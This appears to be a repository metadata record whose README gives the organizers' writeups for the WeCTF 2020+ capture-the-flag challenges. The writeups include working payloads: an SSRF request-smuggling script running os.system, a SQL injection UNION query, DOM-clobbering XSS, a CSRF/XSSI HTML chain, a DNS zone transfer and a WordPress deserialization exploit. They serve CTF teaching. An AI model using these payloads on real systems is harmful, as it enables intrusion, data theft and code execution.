{"id":37141177,"url":"https://github.com/wectf/2020p","last_synced_at":"2026-01-14T16:33:14.845Z","repository":{"id":48919127,"uuid":"322400614","full_name":"wectf/2020p","owner":"wectf","description":":trollface: WeCTF 2020+ Source Code \u0026 Organizer's Writeup","archived":false,"fork":false,"pushed_at":"2021-07-05T17:32:59.000Z","size":3475,"stargazers_count":23,"open_issues_count":0,"forks_count":2,"subscribers_count":2,"default_branch":"master","last_synced_at":"2024-06-21T18:03:14.971Z","etag":null,"topics":["ctf","ctf-challenges","ctf-writeups"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/wectf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-12-17T20:03:39.000Z","updated_at":"2024-01-04T16:53:14.000Z","dependencies_parsed_at":"2022-09-13T19:11:10.857Z","dependency_job_id":null,"html_url":"https://github.com/wectf/2020p","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/wectf/2020p","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/wectf%2F2020p","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/wectf%2F2020p/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/wectf%2F2020p/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/wectf%2F2020p/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/wectf","download_url":"https://codeload.github.com/wectf/2020p/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/wectf%2F2020p/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28426068,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-14T16:32:27.303Z","status":"ssl_error","status_checked_at":"2026-01-14T16:28:36.419Z","response_time":107,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ctf","ctf-challenges","ctf-writeups"],"created_at":"2026-01-14T16:33:14.142Z","updated_at":"2026-01-14T16:33:14.840Z","avatar_url":"https://github.com/wectf.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# WeCTF 2020+\nThank you all for participating! This README contains our writeup sketches. You can also share your writeup on CTFtime.\n\nEvent Link: https://ctftime.org/event/1072\n\n## Run Challenges Locally\n```shell\ngit clone https://github.com/wectf/2020p\ncd 2020p \u0026\u0026 docker-compose up\n```\n\nThe mapping is as following\n\n```\nlocalhost:8000 -\u003e babyrev\n172.129.1.100 -\u003e KVCloud \nlocalhost:8003 -\u003e dont-bf-me\nlocalhost:8004 -\u003e Hashtable\nlocalhost:8005 -\u003e Notebin \nlocalhost:8006 -\u003e Wallet\n```\n\n## babyrev\n38 solves\n\n**Description**\n\nShou only allows his gay friends to view the flag here. We got intels that he used PHP extension for access control and we retrieved a weird binary.\n\nHandout: https://github.com/wectf/2020p/blob/master/babyrev/babyrev.so\n\nAuthor: @qisu\n\n**Writeup**\n\nThe extension compares requests' user-agent with string \"Flag Viewer 2.0\".\n\nPoC:\n```bash\ncurl -H \"User-Agent: Flag Viewer 2.0\" [HOST]\n```\n\n## Red Team\n61 solves\n\n**Description**\n\nWe overheard that Shou's company hoarded a shiny flag at a super secret subdomain.\n\nHis company's domain: shoustinycompany.cf (Challenge is down now)\n\nNote: You are allowed to use subdomain scanner in this challenge.\n\n\n**Writeup**\n\nStep 1: Do a subdomain scan and you would discover `docs.shoustinycompany.cf`\n\nStep 2: You find a few files at that subdomain indicating we need to perform an AXFR attack at 161.35.126.226. \n\n`logs.txt`\n\n```\n[12/19] Eddie started the process following RFC 5936.\n[12/18] Shou approved NS records transfering.\n[12/17] Eddie proposed to transfer NS records to our looking glass server (161.35.126.226:53). \n[12/16] Shou appointed Eddie to be network admin.\n```\n\n`info.txt`\n\n```\n### Company's websites\nLooking Glass: lookingglassv1.shoustinycompany.cf\nFlag: [Removed by Shou]\n```\n\nStep 3: You find another subdomain `lookingglassv1.shoustinycompany.cf` with IP 161.35.126.226.\n\nStep 4: Perform AXFR transaction at `lookingglassv1.shoustinycompany.cf` by \n\n```bash\ndig AXFR shoustinycompany.cf @ns1.shoustinycompany.cf\n```\n\n\n## KVCloud \n13 solves\n\n**Description**\n\nShou hates to use Redis by TCPing it. He instead built a HTTP wrapper for saving his key-value pairs.\n\nFlag is at /flag.txt.\n\nHint: How to keep-alive a connection?\n\nNote 1: Remote is not using 127.0.0.1 as Redis host.\n\nNote 2: Try different host if your payload is not working remotely.\n\nHandout: https://github.com/wectf/2020p/blob/master/kvcloud/handout.zip\n\n**Writeup**\n\nSSRF with Connection: keep-alive:\n```python3\nfrom requests import *\nimport urllib\nport = 5000\ncmd = b\"import os; os.system('whoami')\"\ncontent_len = str(4 + len(cmd)).encode('ascii')\npayload = urllib.parse.quote(b\"/x\\r\\nConnection: keep-alive\\r\\n\" +\n\tb\"Pragma: no-cache\\r\\n\\r\\nPOST /debug HTTP/1.1\\r\\n\" + \n\tb\"Host: 127.0.0.1:5000\\r\\nUser-Agent: curl/7.68.0\\r\\n\"+ \n\tb\"Accept: */*\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: %s\\r\\n\\r\\ncmd=%s\" % (\n\t\tcontent_len, cmd), safe='')\nc = get(\"http://[HOST]:%s/get?redis_port=%s\u0026key=%s\" % (port, port, payload)).content\nprint(c)\nprint(\"http://[HOST]:%s/get?redis_port=%s\u0026key=%s\" % (port, port, payload))\n```\n\n\n## dont-bf-me \n36 solves\n\n**Description**\n\nShou uses Recaptcha for his site to make it \"safer\".\n\nHint: The password is so long that makes any bruteforcing method impotent.\n\nHandout: https://github.com/wectf/2020p/blob/master/dont-bf-me/handout.zip\n\n**Writeup**\n\n`parse_str` in login.php could overwrite $RECAPTCHA_URL and $CORRECT_PASSWORD. \n\n\n## Hashtable\n15 solves\n\n**Description**\n\nUniversal hashing could prevent hackers from DoSing the hash table by creating a lot of collisions. Shou doubt that. Prove him correct by DoSing this hash table implemented with universal hashing.\n\nNote: having 10 collisions at the same slot would give you the flag\n\nHandout: https://github.com/wectf/2020p/blob/master/hashtable/handout.zip\n\n**Writeup**\n\nPseudo Random Number PoC:\n\nSave following file as main.go and run `go run main.go [TIMESTAMP]`.\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"math/big\"\n\t\"math/rand\"\n\t\"os\"\n\t\"strconv\"\n)\n\nconst TableSize = 10000\n\nvar TableSizeBI = big.NewInt(int64(TableSize))\n\nconst MaxCollision = 10\n\ntype LinkedList struct {\n\tContent       [MaxCollision]int\n\tInsertedCount int // count of element in linked list\n}\n\ntype HashTable struct {\n\tContent      [TableSize]*LinkedList // array for mapping hash to the linked list\n\tHashParam1   *big.Int               // p1 for hashing\n\tHashParam2   *big.Int               // p2 for hashing\n\tElementCount int                    // count of all elements in hash table\n}\n\nfunc (t *HashTable) hash(value int) uint {\n\tv := big.NewInt(int64(value))\n\tvar h big.Int\n\th.Exp(v, t.HashParam1, t.HashParam2)\n\th.Mod(\u0026h, TableSizeBI)\n\treturn uint(h.Uint64())\n}\n\nfunc (t *HashTable) insert(value int) bool {\n\tvar elementHash = t.hash(value)                \n\tvar linkedListForHash = t.Content[elementHash]\n\tlinkedListForHash.InsertedCount++\n\tif linkedListForHash.InsertedCount \u003e 10 {\n\t\tfmt.Println(linkedListForHash.Content)\n\t\treturn true\n\t}\n    t.ElementCount++\n    linkedListForHash.Content[linkedListForHash.InsertedCount-1] = value\n\treturn false \n}\n\nfunc main() {\n\tvar t HashTable\n    x, _ := strconv.Atoi(os.Args[1])\n\trand.Seed(int64(x))\n\tt.HashParam1 = big.NewInt(int64(rand.Intn(1 \u003c\u003c 32)))\n    t.HashParam2 = big.NewInt(int64(rand.Intn(1 \u003c\u003c 32)))\n    for i := 0; i \u003c TableSize; i++ {\n\t\tt.Content[i] = \u0026LinkedList{[MaxCollision]int{}, 0}\n\t}\n\tt.recreate()\n\tfor i := 1 \u003c\u003c 13; i \u003c 1\u003c\u003c16; i++ {\n\t\tif t.insert(i) {\n\t\t\tbreak\n\t\t}\n\t}\n}\n```\n\n\n## Hall of Fame\n22 solves\n\n**Description**\n\nWe made a Slack bot (@hof) to remember our past winners. Hope no one hacks it cuz we are running it on a really important database.\n\nHandout: https://github.com/wectf/2020p/tree/master/hof\n\n**Writeup**\n\nSQL Injection\n\nSend following content to @hof would yield the flag:\n```\nrank x') UNION SELECT 1,1,(SELECT flag from flags LIMIT 1) ---\n```\n\n## Notebin \n8 solves\n\n**Description**\n\nHere is where Shou keeps his pathetic diaries and a shinny flag.\n\n**Writeup**\n\nDOM Clobbering =\u003e XSS\n\nSet title as following could make content bypass DOMPurify.\n```html\n\u003ca id=\"_debug\"\u003e\u003c/a\u003e\u003ca id=\"_debug\" name=\"key\" href=\"sha1:f03e8a370aa8dc80f63a6d67401a692ae72fa530\"\u003e\u003c/a\u003e\n```\n\n## Wallet\n4 solves\n\n**Description**\n\nShou has a habit of saving secret (i.e. flag) in the blockchain. Here is where he stores his bitcoin addresses.\n\nNote: wrap what you find on blockchain with we{.....}\n\nHint 1: You should leak the bitcoin address in Shou's wallet first.\n\nHint 2: Shou is using Firefox. Firefox does not have CORB.\n\nHandout: https://github.com/wectf/2020p/blob/master/wallet/handout.zip\n\n**Writeup**\nCSRF + XSSI + Some recon\n\n0.html:\n```html\n\u003cform action=\"http://[HOST]/address\" method=\"post\" id=\"f\"\u003e\n    \u003cinput name=\"address\" value='xxxx\"'/\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003cscript\u003e\n    f.submit()\n\u003c/script\u003e\n```\n\n1.html\n```html\n\u003cform action=\"http://[HOST]/style\" method=\"post\" id=\"f\"\u003e\n    \u003cinput name=\"style\" value='\"Raw'/\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003cscript\u003e\n    f.submit()\n\u003c/script\u003e\n```\n\n2.html\n```html\n\u003cdiv id=iframe2\u003e\u003c/div\u003e\n\u003cdiv id=iframe3\u003e\u003c/div\u003e\n\u003cscript id=\"script1\"\u003e\u003c/script\u003e\n\u003cscript\u003e\n    function sleep(ms) {\n        return new Promise(resolve =\u003e setTimeout(resolve, ms));\n    }\n    async function main(){\n        ifr2 = document.createElement('iframe');\n        ifr2.name='attack';\n        ifr2.src = \"0.html\";\n        iframe2.appendChild(ifr2);\n        await sleep(1000);\n        ifr3 = document.createElement('iframe');\n        ifr3.name='attack';\n        ifr3.src = \"1.html\";\n        iframe3.appendChild(ifr3);\n        await sleep(1000);\n        sc = document.createElement('script');\n        sc.name='attack';\n        sc.src = \"http://[HOST]/\";\n        script1.appendChild(sc);\n        await sleep(1000);\n        dealwithit(style); // \u003c= bitcoin address\n    }\n    main();\n\u003c/script\u003e\n```\n\nSave 0.html, 1.html, 2.html and send 2.html as payload. \n\nAfter getting the bitcoin address, you can find flag in OP_RETURN of one transaction. \n\n## Wordpress\n2 solves\n\n**Description**\n\nShou made his first wordpress plugin! Check it out!\n\nNote 1: it is unnecessary to be admin to solve this challenge and to ensure the stability, we removed almost all possible ways to be admin.\n\nHandout: https://github.com/wectf/2020p/blob/master/wordpress/handout.zip\n\n**Writeup**\n\nWordpress Entry Overwrite + Unsafe Deserialization \n```python\nfrom requests import *\nHOST = \"http://wordpress.ctf.so/\"\nimport re\ndes_content = 'a:1:{i:0;O:5:\"Upage\":4:{s:7:\"user_id\";N;s:9:\"user_info\";a:0:{}s:4:\"conf\";s:5:\"/flag\";s:16:\"disallowed_words\";a:0:{}}}'\ns = Session()\n\ns.post(f\"{HOST}wp-login.php\", headers={ 'Cookie':'wordpress_test_cookie=WP Cookie check' }, data={\n    \"log\": \"[WORDPRESS EMAIL]\",\n    \"pwd\": \"[WORDPRESS PASSWORD]\",\n    \"wp-submit\": \"Log In\",\n    \"redirect_to\": HOST,\n\"testcookie\": \"1\"\n})\n\n\nprint(s.post(f\"{HOST}wp-admin/admin.php?page=edit_upage\", data={\n    \"key\": \"session_tokens\",\n    \"value\": des_content\n}).text)\n\nprint(s.get(f\"{HOST}wp-admin\").text)\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fwectf%2F2020p","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fwectf%2F2020p","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fwectf%2F2020p/lists"}